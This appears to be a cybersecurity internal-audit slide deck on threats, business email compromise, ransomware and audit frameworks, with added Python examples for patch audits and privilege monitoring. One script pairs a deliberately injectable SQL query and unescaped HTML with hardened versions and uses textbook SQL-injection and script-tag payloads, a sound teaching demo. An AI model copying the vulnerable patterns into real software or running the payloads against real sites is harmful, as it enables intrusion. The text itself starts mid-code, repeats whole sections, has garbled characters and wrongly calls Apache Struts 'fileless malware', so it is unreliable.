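    ("printer-17", "Printer firmware", "known default credentials, vendor fix available", date(2015, 5, 5)),
]

# Items management has formally accepted and tracks as a business exception (constructed).
RISK_ACCEPTED = {("srv-erp-01", "Java runtime")}

# Assumed audit date and staleness threshold (one year, matching the 99% statistic).
AS_OF = date(2019, 3, 1)
MAX_PATCH_AGE_DAYS = 365


def stale_findings(findings, as_of=AS_OF, max_age_days=MAX_PATCH_AGE_DAYS) -> list:
    """Findings whose vendor fix has been available for longer than max_age_days."""
    return [f for f in findings if (as_of - f[3]).days > max_age_days]


def unknown_hosts(findings, inventory=INVENTORY) -> list:
    """Hosts the scanner found that the asset inventory does not know about."""
    return sorted({f[0] for f in findings if f[0] not in inventory})


def audit_report(findings, inventory=INVENTORY, accepted=RISK_ACCEPTED, as_of=AS_OF) -> dict:
    """Split stale findings into those with and without a formal risk acceptance,
    and list hosts missing from the inventory."""
    stale = stale_findings(findings, as_of)
    return {
        "stale_unaccepted": [(h, p) for h, p, _, _ in stale if (h, p) not in accepted],
        "stale_accepted": [(h, p) for h, p, _, _ in stale if (h, p) in accepted],
        "hosts_missing_from_inventory": unknown_hosts(findings, inventory),
    }


def run_audit() -> dict:
    return audit_report(SCAN_FINDINGS)


if __name__ == "__main__":
    for key, value in run_audit().items():
        print(f"{key}: {value}")
```

Each list maps to one of the slide's points: `stale_unaccepted` is the population that the 99% statistic warns about, `hosts_missing_from_inventory` is the device-discovery gap, and `stale_accepted` is what the auditor should trace to a documented management acceptance and its mitigating controls.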
CYBERSECURITY – SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected.
• Perform an inventory of IT devices and assess each device's risk relating to patches.
• Understand your company's fundamental process around patch management and focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems).
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval).
• Implement a continual end user training program.
• Ensure backups and recovery plans work as intended and are properly segregated.
• Understand the coverage and terms of your company's cyber insurance policy.
• Assess the requirement for multi-factor authentication.
ANATOMY OF AN ATTACK
QUESTIONS
David Losacco, Principal
mobile: (918) 625-8870
davidlosacco@stinnett-associates.com
Stinnett & Associates
stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
HOW DO THEY DO IT?
Cyber criminals have multiple means to achieve financial gain:
• Theft of funds (bank accounts)
• Extortion (ransomware)
• Selling of stolen credit cards
• Selling of PII and PHI data
• Insider trading information
• Using the compromised environment for other attacks or for rent (cryptojacking)
EVER-CHANGING LANDSCAPE
The types of cyber attacks and exploits are changing:
• Server attacks, once at 50%, are trending down.
• User device and person attacks are both trending upward at nearly the same pace due to malware, ransomware and phishing attacks.
COMMON TERMS AND DEFINITIONS
Information Technology (IT) – The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise; the department within a company that is charged with establishing, monitoring and maintaining information technology systems and services.
Operational Technology (OT) – The hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise. OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA). OT devices and environments are typically run separately from IT departments. These are the devices that communicate with pipelines and electrical grids (and nuclear power plants).
Internet of Things – A computing concept that describes the idea of everyday physical devices (DVR systems, thermostats, refrigerators, vehicles) being connected to the internet and being able to identify themselves to other devices, which enables the devices to collect and exchange data.
ATTACKS IN THE HEADLINES
https://www.businessinsider.com/hackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
https://jsis.washington.edu/news/cyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
COMMON TERMS AND DEFINITIONS
Bot – A bot is a software "robot" that performs an extensive set of automated tasks on its own. Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets.
Botnet – A number of Internet-connected devices (e.g. computers, DVR systems and other devices), each of which is running one or more bots after being infected with malware. Botnets can be used to perform Distributed Denial of Service attacks, steal data, send spam and allow the attacker access to the device and its connection. Botnets can be rented out to other hackers or cyber criminals.
Denial of Service (DoS) and Distributed Denial of Service – A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. A Distributed DoS is the same as a DoS attack but involves multiple computers attacking the network from multiple locations. Typically the computers being used have been infected and are part of a botnet.
ATTACKS IN THE HEADLINES
https://www.csoonline.com/article/3258748/the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internet.html
https://www.wired.com/story/reaper-iot-botnet-infected-million-networks/
COMMON TERMS AND DEFINITIONS
Middleware – Software that facilitates the exchange of data between two application programs within the same environment or across different hardware and network environments. Three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware.
Man-in-the-Middle (MITM) Attacks – An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties. The attacker is able to alter or obtain data for themselves while unknown to the other two parties.
SQL Injection and Cross-site Scripting Attacks – An attack occurrence where the attacker injects malicious code into a website. In SQL Injection, the attacker uses the SQL language to obtain information back from the website that was unintended. In Cross-site Scripting, the attacker injects code that only impacts other users of the website.
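Added example, not part of the presentation: the Python script below shows the SQL injection and cross-site scripting definitions above in working code, placing a vulnerable database lookup beside its parameterized form and an unescaped HTML render beside its escaped form. The in-memory customer table and the test inputs are constructed for this example; nothing here comes from the deck or from any real website.

```python
import html
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for a website's backend (example data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO customers (name, email) VALUES (?, ?)",
        [("Alice", "alice@example.com"), ("Bob", "bob@example.com")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """Vulnerable: the caller's text is pasted into the SQL statement, so text that
    contains SQL syntax changes what the query means (SQL injection)."""
    query = f"SELECT name, email FROM customers WHERE name = '{name}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    """Hardened: a parameterized query hands the text to the database as a value,
    never as part of the statement."""
    return conn.execute("SELECT name, email FROM customers WHERE name = ?", (name,)).fetchall()


def render_comment_vulnerable(comment: str) -> str:
    """Vulnerable: untrusted text is written straight into HTML, so markup in it is
    interpreted by every other user's browser (cross-site scripting)."""
    return f"<p>{comment}</p>"


def render_comment_safe(comment: str) -> str:
    """Hardened: escape the text so the browser displays it instead of interpreting it."""
    return f"<p>{html.escape(comment)}</p>"


def demo() -> dict:
    """Run both pairs against constructed inputs and return what each version does."""
    conn = build_demo_db()
    sqli_input = "' OR '1'='1"                 # constructed: the textbook injection string
    xss_input = "<script>alert(1)</script>"    # constructed: the textbook script tag
    return {
        "vulnerable_rows": len(lookup_vulnerable(conn, sqli_input)),  # every customer row
        "safe_rows": len(lookup_safe(conn, sqli_input)),              # no row has that literal name
        "benign_rows": len(lookup_safe(conn, "Alice")),               # normal lookup still works
        "vulnerable_html": render_comment_vulnerable(xss_input),      # tag survives intact
        "safe_html": render_comment_safe(xss_input),                  # tag rendered as text
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

For an auditor the control question is whether the application's database access uses parameterized queries throughout and whether user-supplied text is escaped before it is written into a page; the vulnerable functions show why the answer matters, and the hardened ones show what "yes" looks like in code.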
ATTACKS IN THE HEADLINES
https://www.zdnet.com/article/man-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable/
https://krebsonsecurity.com/2018/09/secret-service-warns-of-surge-in-atm-wiretapping-attacks/comment-page-1/
https://www.scmagazine.com/home/security-news/cisco-patches-prime-license-manager-sql-injection-vulnerability
https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions/
COMMON TERMS AND DEFINITIONS
Common Vulnerabilities and Exposures (CVE) – A catalog sponsored by Homeland Security that documents known cyber threats. Vulnerabilities are known errors in a system or software that provide an attacker with direct access. Exposures are known errors that allow an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malware and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level.
Zero Day Vulnerability/Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by the vendor.
Advanced Persistent Threat – A set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity.
MALWARE
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts.
• Ransomware is a version of malware that has been in the headlines.
• Malware can grant command and control of a device to the hackers.
• 1 in 131 emails contained malware in 2016.
• "Fileless" malware is a new variant that is more difficult to detect.
COMPLEXITY BEHIND THE EQUIFAX ATTACK
• The attack started in early March 2017 with hackers using a bot programmed to search the web for a recently released CVE (Common Vulnerability and Exposure).
• It took the hackers two months before they found the vulnerability on one of Equifax's websites used to help customers with claims.
• Hackers then used another vulnerability (a fileless malware named Apache Struts) that was also a CVE that had been issued a month before but never fixed.
• Hackers spent an estimated 76 days in the network and downloaded records from 51 different databases.
• Over 148 million records were stolen.
• The attack was not identified until July 30, 2017.
EQUIFAX – WHAT WAS LOST
In addition to US consumers, the UK Data Protection Authority, the Information Commissioner's Office, reported:
• Approximately 20,000 UK data subjects had names, dates of birth, telephone numbers and driving license numbers exposed.
• More than 600,000 UK data subjects had names, dates of birth and telephone numbers exposed.
• Up to 15 million UK data subjects had names and dates of birth exposed.
COMMON TERMS AND DEFINITIONS
Dark Web / Darknet – Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities, such as black market purchasing of stolen PII or credit card data as well as botnet rentals. Bitcoins are traded on the Dark Web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that, along with all Bitcoin transactions, is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released to come into circulation; it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process (that is, the amount of computing power involved) increases.
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the user's files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.
• The use of BITCOINS is typically the payment method.
• Ransomware attacks were growing at a rate of 350% annually until 2017 and have now dropped but are still present (HR and healthcare companies both in February).
• The WannaCry ransomware attack impacted over 200,000 people across 150 countries (it included a worm).
RANSOMWARE
Ransomware-as-a-Service (RaaS) allows any amateur attacker to get into the business with basic knowledge and less effort. The amateur attacker can visit a RaaS site on the dark web and set up an account to create the ransomware package. It is up to the attacker to distribute the ransomware, while the RaaS will handle the ransom payments. The RaaS developer takes a cut of any payments that are made. The developer will also reduce their cut depending on the volume of payments received.
BUSINESS EMAIL COMPROMISE (BEC)
• Business Email Compromise (BEC) is an exploit targeting a company's corporate email accounts and impersonating or "spoofing" the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company, its business partners and/or employees.
• The FBI's Internet Crime Complaint Center, or IC3, said that based on fraud reports submitted from October 2013 to May 2018 there were 41,058 total US victims of BEC schemes, which collectively lost at least $2.9 billion, while global losses were more than four times that amount (FBI: Global Business Email Compromise Losses Hit $12.5 Billion).
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
• NIST Cyber Security Framework v1.1
• Various other NIST special publications
Center for Internet Security
• Critical Security Controls (formerly SANS Top 20)
International Organization for Standardization
• ISO 27001 family – Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). Source: itgovernanceusa.com
According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework in their organization and 44% use more than one framework. Source: itgovernanceusa.com
CENTER FOR INTERNET SECURITY – CRITICAL SECURITY CONTROLS
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX.
• Confirm IT is not using privileged accounts for daily tasks, which can include browsing the internet or answering email
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing)
• Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end user training around cybersecurity. Oftentimes the uneducated or untrained end user is the cyber attacker's first entry point into the company
• Determine whether your company conducts random phishing awareness training campaigns
• Evaluate your company's overall cybersecurity training and awareness program
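Two of the access checks above can be automated against exports IT already has. The following is an added example, not part of the presentation: it alerts on additions to privileged groups from constructed Windows Security event records (event IDs 4728, 4732 and 4756 are the real "member added to security-enabled group" events; the line format below is a simplified constructed export, not real Windows output) and compares each account's enforced password settings against an assumed stricter standard for privileged accounts.

```python
"""Added example (not from the presentation): two audit checks for the
'User and Administrator Level Access' points, run over constructed data.

1. Alert on additions to privileged groups. Windows Security event IDs 4728,
   4732 and 4756 record a member being added to a global, local or universal
   security-enabled group; the log lines below are constructed samples in a
   simplified key=value export format, not real Windows output.
2. Check that privileged accounts are held to a stricter password standard
   than normal accounts. The thresholds are assumptions, not the speaker's.
"""
import re

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}
GROUP_ADD_EVENT_IDS = {"4728", "4732", "4756"}

# Constructed sample export: timestamp, event id, who made the change (Subject),
# who was changed (Target) and the group involved ("-" when not applicable).
SAMPLE_EVENTS = """\
2019-03-04T08:12:09Z EventID=4624 Subject=CORP\\jdoe Target=CORP\\jdoe Group=-
2019-03-04T08:40:51Z EventID=4728 Subject=CORP\\svc_helpdesk Target=CORP\\tmp_contractor Group="Domain Admins"
2019-03-04T09:02:33Z EventID=4732 Subject=CORP\\jdoe Target=CORP\\jdoe Group="Administrators"
2019-03-04T09:15:00Z EventID=4728 Subject=CORP\\it_admin Target=CORP\\newhire Group="Sales"
"""

EVENT_RE = re.compile(
    r'^(?P<ts>\S+) EventID=(?P<id>\d+) Subject=(?P<subject>\S+) '
    r'Target=(?P<target>\S+) Group=(?:"(?P<group>[^"]*)"|(?P<bare>\S+))$'
)


def privileged_group_changes(log_text=SAMPLE_EVENTS):
    """Return one alert per addition to a privileged group.
    Self-elevation (the actor adds their own account) is marked high severity."""
    alerts = []
    for line in log_text.splitlines():
        m = EVENT_RE.match(line)
        if not m or m["id"] not in GROUP_ADD_EVENT_IDS:
            continue
        group = m["group"] if m["group"] is not None else m["bare"]
        if group not in PRIVILEGED_GROUPS:
            continue
        severity = "high" if m["subject"] == m["target"] else "medium"
        alerts.append({"time": m["ts"], "actor": m["subject"], "member": m["target"],
                       "group": group, "severity": severity})
    return alerts


# Assumed minimum standard per account tier: (minimum password length, maximum age in days)
PASSWORD_STANDARD = {"normal": (12, 90), "privileged": (16, 60)}

# Constructed account inventory; min_length / max_age_days are what the policy
# applied to that account actually enforces, shared = credential known to be shared.
ACCOUNTS = [
    {"name": "CORP\\jdoe",       "privileged": False, "min_length": 12, "max_age_days": 90, "shared": False},
    {"name": "CORP\\it_admin",   "privileged": True,  "min_length": 12, "max_age_days": 90, "shared": False},
    {"name": "CORP\\svc_backup", "privileged": True,  "min_length": 20, "max_age_days": 60, "shared": True},
    {"name": "CORP\\da_mwong",   "privileged": True,  "min_length": 16, "max_age_days": 45, "shared": False},
]


def password_standard_findings(accounts=ACCOUNTS, standard=PASSWORD_STANDARD):
    """Return (account, issue) pairs where the enforced settings fall short of the
    standard for the account's tier, or a privileged credential is shared."""
    findings = []
    for a in accounts:
        tier = "privileged" if a["privileged"] else "normal"
        min_len, max_age = standard[tier]
        if a["min_length"] < min_len:
            findings.append((a["name"], f"minimum length {a['min_length']} < {min_len} required for {tier}"))
        if a["max_age_days"] > max_age:
            findings.append((a["name"], f"change interval {a['max_age_days']}d > {max_age}d allowed for {tier}"))
        if a["privileged"] and a["shared"]:
            findings.append((a["name"], "privileged credential is shared"))
    return findings


if __name__ == "__main__":
    for alert in privileged_group_changes():
        print(f"[{alert['severity']}] {alert['actor']} added {alert['member']} "
              f"to {alert['group']} at {alert['time']}")
    for name, issue in password_standard_findings():
        print(f"{name}: {issue}")
```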
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures. This includes:
  • 99% of exploited vulnerabilities were compromised more than a year after the patch was published
  • Companies do not know all of the devices on their network and therefore are unable to adequately assess their patch management process
• Ensure your IT department is scanning all assets continuously so that newly discovered vulnerabilities are identified quickly
• Validate that the patch management process is effective in ensuring all IT devices are properly updated (patched) with the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched for business reasons, determine whether those risks are formally accepted and tracked by management. Assess whether sufficient mitigating controls are in place.
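The patch-management points above reduce to a few questions an auditor can ask of a device inventory, a scan export and the risk-acceptance register. The following is an added example, not part of the presentation: it reports scanned hosts missing from the inventory (which therefore cannot be assessed), findings whose patch has been available longer than an assumed SLA (internet-facing devices first, with the ones older than a year flagged), and findings covered by a formally accepted, unexpired risk acceptance. The inventory, findings, placeholder CVE ids and SLAs are all constructed.

```python
"""Added example (not from the presentation): a patch-management audit check
over a constructed device inventory and constructed scan findings. The CVE
ids are placeholders, the SLAs and all data are assumptions."""
from datetime import date

# Assumed remediation SLAs, in days after the vendor published the patch
SLA_DAYS = {"internet_facing": 30, "internal": 90}
YEAR_DAYS = 365   # the "more than a year after the patch" lag quoted in the slide

# Constructed inventory
INVENTORY = {
    "web01": {"internet_facing": True,  "kind": "server"},
    "vpn01": {"internet_facing": True,  "kind": "network"},
    "db01":  {"internet_facing": False, "kind": "server"},
    "fs01":  {"internet_facing": False, "kind": "server"},
    "hmi01": {"internet_facing": False, "kind": "OT"},
}

# Constructed scan output: open findings with the vendor's patch release date
SCAN_FINDINGS = [
    {"host": "web01",      "id": "CVE-EXAMPLE-1", "software": "Apache Struts",    "patch_published": date(2017, 9, 5)},
    {"host": "vpn01",      "id": "CVE-EXAMPLE-2", "software": "VPN firmware",     "patch_published": date(2019, 1, 20)},
    {"host": "db01",       "id": "CVE-EXAMPLE-3", "software": "Java runtime",     "patch_published": date(2018, 10, 1)},
    {"host": "fs01",       "id": "CVE-EXAMPLE-4", "software": "Windows SMB",      "patch_published": date(2019, 2, 12)},
    {"host": "hmi01",      "id": "CVE-EXAMPLE-5", "software": "HMI software",     "patch_published": date(2018, 1, 10)},
    {"host": "printer-7f", "id": "CVE-EXAMPLE-6", "software": "Printer firmware", "patch_published": date(2018, 6, 1)},
]

# Constructed risk-acceptance register: (host, finding id) -> approval record
RISK_ACCEPTANCES = {
    ("hmi01", "CVE-EXAMPLE-5"): {"approved_by": "CIO", "expires": date(2019, 12, 31),
                                 "mitigation": "isolated OT VLAN, no internet access"},
}


def assess_patching(findings=SCAN_FINDINGS, inventory=INVENTORY,
                    acceptances=RISK_ACCEPTANCES, as_of=date(2019, 3, 1)):
    """Classify every open finding as unknown host, overdue, accepted or within SLA."""
    report = {"unknown_hosts": [], "overdue": [], "accepted": [], "within_sla": []}
    for f in findings:
        host = inventory.get(f["host"])
        if host is None:
            # A device nobody inventoried cannot be assessed at all
            report["unknown_hosts"].append(f["host"])
            continue
        age = (as_of - f["patch_published"]).days
        exposure = "internet_facing" if host["internet_facing"] else "internal"
        entry = {"host": f["host"], "id": f["id"], "software": f["software"],
                 "exposure": exposure, "patch_age_days": age,
                 "over_a_year": age > YEAR_DAYS}
        acceptance = acceptances.get((f["host"], f["id"]))
        if acceptance is not None and acceptance["expires"] >= as_of:
            # Formally accepted and still in date: report the mitigating control, not a gap
            entry["mitigation"] = acceptance["mitigation"]
            report["accepted"].append(entry)
        elif age > SLA_DAYS[exposure]:
            if acceptance is not None:
                entry["note"] = "risk acceptance expired"
            report["overdue"].append(entry)
        else:
            report["within_sla"].append(entry)
    # Internet-facing devices first, then the longest-standing patch lag
    report["overdue"].sort(key=lambda e: (e["exposure"] != "internet_facing", -e["patch_age_days"]))
    return report


if __name__ == "__main__":
    result = assess_patching()
    print("Not in inventory:", result["unknown_hosts"])
    for e in result["overdue"]:
        flag = " (OVER A YEAR)" if e["over_a_year"] else ""
        print(f"OVERDUE {e['host']} {e['id']} {e['software']} {e['patch_age_days']}d{flag}")
    for e in result["accepted"]:
        print(f"ACCEPTED {e['host']} {e['id']} mitigated by: {e['mitigation']}")
```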
CYBERSECURITY – SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Understand your company's fundamental process around Patch Management and focus on higher risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all User and Admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end user training program
• Ensure backups and recovery plans work as intended and are properly segregated
• Understand the coverage and terms of your company's cyber insurance policy
• Assess the requirement for Multi-factor Authentication
ANATOMY OF AN ATTACK
QUESTIONS
David Losacco, Principal – mobile (918) 625-8870
davidlosacco@stinnett-associates.com
Stinnett & Associates – stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
EVERCHANGING LANDSCAPE
The types of cyber attacks and exploits are changing:
• Server attacks, once at 50%, are trending down
• User Device and Person attacks are both trending upward at nearly the same pace, due to Malware, Ransomware and Phishing attacks
COMMON TERMS AND DEFINITIONS
Information Technology (IT) – The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise: the department within a company that is charged with establishing, monitoring and maintaining information technology systems and services.
Operational Technology (OT) – The hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise. OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition (SCADA) systems. OT devices and environments are typically run separately from IT departments. These are the devices that communicate with pipelines and electrical grids (and nuclear power plants).
Internet of Things – A computing concept that describes the idea of everyday physical devices (DVR systems, thermostats, refrigerators, vehicles) being connected to the internet and being able to identify themselves to other devices, which enables the devices to collect and exchange data.
ATTACKS IN THE HEADLINES
